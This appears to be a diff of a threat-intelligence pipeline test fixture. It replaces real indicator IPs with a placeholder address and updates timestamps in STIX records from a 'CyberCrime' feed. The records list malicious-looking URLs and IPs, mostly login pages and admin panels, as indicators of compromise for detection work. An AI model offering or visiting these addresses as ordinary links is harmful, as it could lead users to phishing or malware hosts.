@@ -20438,16 +20438,16 @@
"provider": "CyberCrime",
"url": {
"path": "/login",
- "original": "http://81.4.100.75/login",
+ "original": "http://89.160.20.156/login",
"scheme": "http",
- "domain": "81.4.100.75",
- "full": "http://81.4.100.75/login"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/login"
}
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387950192Z",
- "original": "{\"created\":\"2020-02-08T14:04:37.657Z\",\"description\":\"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d2987902-59e6-4667-b011-f20e93e283d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:04:37.657Z\",\"name\":\"mal_url: http://81.4.100.75/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://81.4.100.75/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:37.657Z\"}",
+ "ingested": "2021-12-13T08:38:40.025133Z",
+ "original": "{\"created\":\"2020-02-08T14:04:37.657Z\",\"description\":\"TS ID: 55298071095; iType: mal_url; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d2987902-59e6-4667-b011-f20e93e283d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:04:37.657Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:37.657Z\"}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -20498,7 +20498,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387954561Z",
+ "ingested": "2021-12-13T08:38:40.025140200Z",
"original": "{\"created\":\"2020-02-08T14:04:41.785Z\",\"description\":\"TS ID: 55298072117; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--093718d8-bb0e-4816-ab4b-c97cb95d5531\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-08T14:04:41.785Z\",\"name\":\"mal_url: http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://serviciotecnicoenperu.com/contactar/zz/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:41.785Z\"}",
"category": "threat",
"type": "indicator",
@@ -20550,7 +20550,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387958889Z",
+ "ingested": "2021-12-13T08:38:40.025147500Z",
"original": "{\"created\":\"2020-02-08T14:04:43.759Z\",\"description\":\"TS ID: 55298071859; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--dfdca2f0-75cc-4e33-9045-e2ba136c0183\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:04:43.759Z\",\"name\":\"mal_url: http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:43.759Z\"}",
"category": "threat",
"type": "indicator",
@@ -20601,7 +20601,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387963758Z",
+ "ingested": "2021-12-13T08:38:40.025154600Z",
"original": "{\"created\":\"2020-02-08T14:04:43.783Z\",\"description\":\"TS ID: 55298070283; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0e501865-d0a0-493b-8302-02efe0f2c5d1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-08T14:04:43.783Z\",\"name\":\"mal_url: http://kmfjlool.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kmfjlool.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:04:43.783Z\"}",
"category": "threat",
"type": "indicator",
@@ -20620,7 +20620,7 @@
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
],
- "name": "mal_ip: 147.139.139.206",
+ "name": "mal_ip: 89.160.20.156",
"description": "TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime",
"modified": "2020-02-09T05:09:33.689Z",
"valid_from": "2020-02-09T05:09:33.689Z",
@@ -20642,12 +20642,12 @@
"first_seen": "2020-02-09T05:09:33.689Z",
"type": "ipv4-addr",
"provider": "CyberCrime",
- "ip": "147.139.139.206"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387968206Z",
- "original": "{\"created\":\"2020-02-09T05:09:33.689Z\",\"description\":\"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-09T05:09:33.689Z\",\"name\":\"mal_ip: 147.139.139.206\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '147.139.139.206']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-09T05:09:33.689Z\"}",
+ "ingested": "2021-12-13T08:38:40.025161800Z",
+ "original": "{\"created\":\"2020-02-09T05:09:33.689Z\",\"description\":\"TS ID: 55300025372; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--91f46249-8fa5-4e88-bb38-0448b08b5448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-09T05:09:33.689Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-09T05:09:33.689Z\"}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -20697,7 +20697,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387972735Z",
+ "ingested": "2021-12-13T08:38:40.025166Z",
"original": "{\"created\":\"2020-02-10T02:01:30.459Z\",\"description\":\"TS ID: 55303483956; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--07925c70-b345-4aa6-8f40-e19602cf0429\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:01:30.459Z\",\"name\":\"mal_url: http://pentestblog.xyz/panel/login/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pentestblog.xyz/panel/login/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:30.459Z\"}",
"category": "threat",
"type": "indicator",
@@ -20749,7 +20749,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387977814Z",
+ "ingested": "2021-12-13T08:38:40.025171500Z",
"original": "{\"created\":\"2020-02-10T02:01:36.571Z\",\"description\":\"TS ID: 55303483889; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--00195f28-4745-41a3-9710-7e2266b1270e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-10T02:01:36.571Z\",\"name\":\"mal_url: http://f0386817.xsph.ru/32cd6120/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0386817.xsph.ru/32cd6120/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:36.571Z\"}",
"category": "threat",
"type": "indicator",
@@ -20800,7 +20800,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387982373Z",
+ "ingested": "2021-12-13T08:38:40.025177Z",
"original": "{\"created\":\"2020-02-10T02:01:36.621Z\",\"description\":\"TS ID: 55303483880; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--eae0ef0b-3b77-401b-8835-4ad9cb97171d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:01:36.621Z\",\"name\":\"mal_url: http://f0395086.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0395086.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:01:36.621Z\"}",
"category": "threat",
"type": "indicator",
@@ -20819,7 +20819,7 @@
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
],
- "name": "mal_url: http://45.76.237.80/panel/admin.php",
+ "name": "mal_url: http://89.160.20.156/panel/admin.php",
"description": "TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime",
"modified": "2020-02-10T02:02:06.427Z",
"valid_from": "2020-02-10T02:02:06.427Z",
@@ -20844,16 +20844,16 @@
"url": {
"path": "/panel/admin.php",
"extension": "php",
- "original": "http://45.76.237.80/panel/admin.php",
+ "original": "http://89.160.20.156/panel/admin.php",
"scheme": "http",
- "domain": "45.76.237.80",
- "full": "http://45.76.237.80/panel/admin.php"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/panel/admin.php"
}
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387987052Z",
- "original": "{\"created\":\"2020-02-10T02:02:06.427Z\",\"description\":\"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:06.427Z\",\"name\":\"mal_url: http://45.76.237.80/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.76.237.80/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:06.427Z\"}",
+ "ingested": "2021-12-13T08:38:40.025183400Z",
+ "original": "{\"created\":\"2020-02-10T02:02:06.427Z\",\"description\":\"TS ID: 55303483638; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--05d25a1d-cf55-4b36-93ee-dbf618980b2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:06.427Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:06.427Z\"}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -20904,7 +20904,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387991790Z",
+ "ingested": "2021-12-13T08:38:40.025187300Z",
"original": "{\"created\":\"2020-02-10T02:02:14.887Z\",\"description\":\"TS ID: 55303483942; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--9af2b6ee-aec5-481a-8e93-2a7153fcf05e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-10T02:02:14.887Z\",\"name\":\"mal_url: http://worldatdoor.in/wire/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/wire/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:14.887Z\"}",
"category": "threat",
"type": "indicator",
@@ -20956,7 +20956,7 @@
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.387998313Z",
+ "ingested": "2021-12-13T08:38:40.025192600Z",
"original": "{\"created\":\"2020-02-10T02:02:16.263Z\",\"description\":\"TS ID: 55303483899; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--1641ace0-37a5-4364-8400-e422b5cdbcec\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-10T02:02:16.263Z\",\"name\":\"mal_url: http://wwe23pro.myjino.ru/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wwe23pro.myjino.ru/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:16.263Z\"}",
"category": "threat",
"type": "indicator",
@@ -20975,7 +20975,7 @@
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
],
- "name": "mal_ip: 2.59.117.6",
+ "name": "mal_ip: 89.160.20.156",
"description": "TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime",
"modified": "2020-02-10T02:02:35.848Z",
"valid_from": "2020-02-10T02:02:35.848Z",
@@ -20997,12 +20997,12 @@
"first_seen": "2020-02-10T02:02:35.848Z",
"type": "ipv4-addr",
"provider": "CyberCrime",
- "ip": "2.59.117.6"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T05:57:34.388002911Z",
- "original": "{\"created\":\"2020-02-10T02:02:35.848Z\",\"description\":\"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:35.848Z\",\"name\":\"mal_ip: 2.59.117.6\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '2.59.117.6']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:35.848Z\"}",
+ "ingested": "2021-12-13T08:38:40.025200200Z",
+ "original": "{\"created\":\"2020-02-10T02:02:35.848Z\",\"description\":\"TS ID: 55303483868; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--3e09e501-0b80-4de6-b5a9-1d30b5687a24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-44\"],\"modified\":\"2020-02-10T02:02:35.848Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:35.848Z\"}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -21052,7 +21052,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388007470Z", + "ingested": "2021-12-13T08:38:40.025204500Z", "original": "{\"created\":\"2020-02-10T02:02:45.419Z\",\"description\":\"TS ID: 55303483940; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--85ab9568-e7f5-40c6-935d-8bdbe263970c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-10T02:02:45.419Z\",\"name\":\"mal_url: http://garex.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://garex.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:45.419Z\"}", "category": "threat", "type": "indicator", @@ -21104,7 +21104,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388012770Z", + "ingested": "2021-12-13T08:38:40.025209100Z", "original": "{\"created\":\"2020-02-10T02:02:47.096Z\",\"description\":\"TS ID: 55303483952; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--05509090-9cd9-43b0-892c-02318134a893\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-10T02:02:47.096Z\",\"name\":\"mal_url: http://jerichoconstructioncompany.com/wps/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jerichoconstructioncompany.com/wps/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:47.096Z\"}", "category": "threat", "type": "indicator", 
@@ -21155,7 +21155,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388017218Z", + "ingested": "2021-12-13T08:38:40.025212700Z", "original": "{\"created\":\"2020-02-10T02:02:55.786Z\",\"description\":\"TS ID: 55303483873; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--c884bffa-1248-483b-bdf8-dada05340ea4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-10T02:02:55.786Z\",\"name\":\"mal_url: http://f0396079.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396079.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:02:55.786Z\"}", "category": "threat", "type": "indicator", @@ -21207,7 +21207,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388021406Z", + "ingested": "2021-12-13T08:38:40.025217800Z", "original": "{\"created\":\"2020-02-10T02:03:03.62Z\",\"description\":\"TS ID: 55303483931; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--14bb6b9e-e4f9-4059-a1a0-f06481441883\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:03:03.62Z\",\"name\":\"mal_url: http://impulsefittness.info/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://impulsefittness.info/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:03.62Z\"}", "category": "threat", "type": "indicator", 
@@ -21259,7 +21259,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388025644Z", + "ingested": "2021-12-13T08:38:40.025223800Z", "original": "{\"created\":\"2020-02-10T02:03:53.711Z\",\"description\":\"TS ID: 55303483865; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--92bdd0d7-0d15-4bcb-bf37-6aec2b0114b8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-10T02:03:53.711Z\",\"name\":\"mal_url: http://pentestblog.xyz/csc/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pentestblog.xyz/csc/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:53.711Z\"}", "category": "threat", "type": "indicator", @@ -21310,7 +21310,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388029852Z", + "ingested": "2021-12-13T08:38:40.025230100Z", "original": "{\"created\":\"2020-02-10T02:03:57.56Z\",\"description\":\"TS ID: 55303483938; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--eb0c4603-82ac-4283-bda3-ce9d276bc002\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:03:57.56Z\",\"name\":\"mal_url: http://pom4ekk.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pom4ekk.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:03:57.56Z\"}", "category": "threat", "type": "indicator", 
@@ -21361,7 +21361,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388034410Z", + "ingested": "2021-12-13T08:38:40.025237400Z", "original": "{\"created\":\"2020-02-10T02:04:24.419Z\",\"description\":\"TS ID: 55303483870; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--14393248-efcc-4446-9c71-c24b8ea653ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-10T02:04:24.419Z\",\"name\":\"mal_url: http://f0396384.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396384.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:04:24.419Z\"}", "category": "threat", "type": "indicator", @@ -21412,7 +21412,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388039039Z", + "ingested": "2021-12-13T08:38:40.025244500Z", "original": "{\"created\":\"2020-02-10T02:04:39.273Z\",\"description\":\"TS ID: 55303483883; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5139b761-30aa-48b8-a7f6-4d125117fd4d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-10T02:04:39.273Z\",\"name\":\"mal_url: http://f0391247.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391247.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-10T02:04:39.273Z\"}", "category": "threat", "type": "indicator", 
@@ -21464,7 +21464,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388043467Z", + "ingested": "2021-12-13T08:38:40.025251600Z", "original": "{\"created\":\"2020-02-11T02:05:59.738Z\",\"description\":\"TS ID: 55306531291; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--8aed750b-7bc5-41be-956d-5c27ba956957\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:05:59.738Z\",\"name\":\"mal_url: http://borrdrillling.com/benz-forlife/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/benz-forlife/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:05:59.738Z\"}", "category": "threat", "type": "indicator", @@ -21515,7 +21515,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388047766Z", + "ingested": "2021-12-13T08:38:40.025258800Z", "original": "{\"created\":\"2020-02-11T02:06:33.437Z\",\"description\":\"TS ID: 55306531295; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--939b7b32-9004-40e0-8c48-77b9452a0902\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:06:33.437Z\",\"name\":\"mal_url: http://borrdrillling.com/fox/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/fox/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:06:33.437Z\"}", "category": "threat", "type": "indicator", 
@@ -21567,7 +21567,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388052224Z", + "ingested": "2021-12-13T08:38:40.025266100Z", "original": "{\"created\":\"2020-02-11T02:06:48.532Z\",\"description\":\"TS ID: 55306531290; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--f2f9ebc5-814d-4ff2-9979-76264e15d743\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-11T02:06:48.532Z\",\"name\":\"mal_url: http://borrdrillling.com/benz/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/benz/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:06:48.532Z\"}", "category": "threat", "type": "indicator", @@ -21619,7 +21619,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388056652Z", + "ingested": "2021-12-13T08:38:40.025273400Z", "original": "{\"created\":\"2020-02-11T02:07:49.317Z\",\"description\":\"TS ID: 55306531320; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--782c926c-e92f-451e-8aaf-dbe446b8abe4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-11T02:07:49.317Z\",\"name\":\"mal_url: http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/okye/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:07:49.317Z\"}", "category": "threat", "type": "indicator", 
@@ -21671,7 +21671,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388060790Z", + "ingested": "2021-12-13T08:38:40.025280600Z", "original": "{\"created\":\"2020-02-11T02:07:49.341Z\",\"description\":\"TS ID: 55306531298; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--336d437c-cb0b-473c-b157-3edad63d3a65\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-11T02:07:49.341Z\",\"name\":\"mal_url: http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/gozie/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-11T02:07:49.341Z\"}", "category": "threat", "type": "indicator", @@ -21723,7 +21723,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388065539Z", + "ingested": "2021-12-13T08:38:40.025286400Z", "original": "{\"created\":\"2020-02-12T02:02:34.926Z\",\"description\":\"TS ID: 55309106417; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--1fff5727-69fd-4477-a610-3542e53642ae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-12T02:02:34.926Z\",\"name\":\"mal_url: http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://alwaysdelivery.xyz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:02:34.926Z\"}", "category": "threat", "type": "indicator", 
@@ -21742,7 +21742,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://188.227.85.53/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime", "modified": "2020-02-12T02:03:19.477Z", "valid_from": "2020-02-12T02:03:19.477Z", 
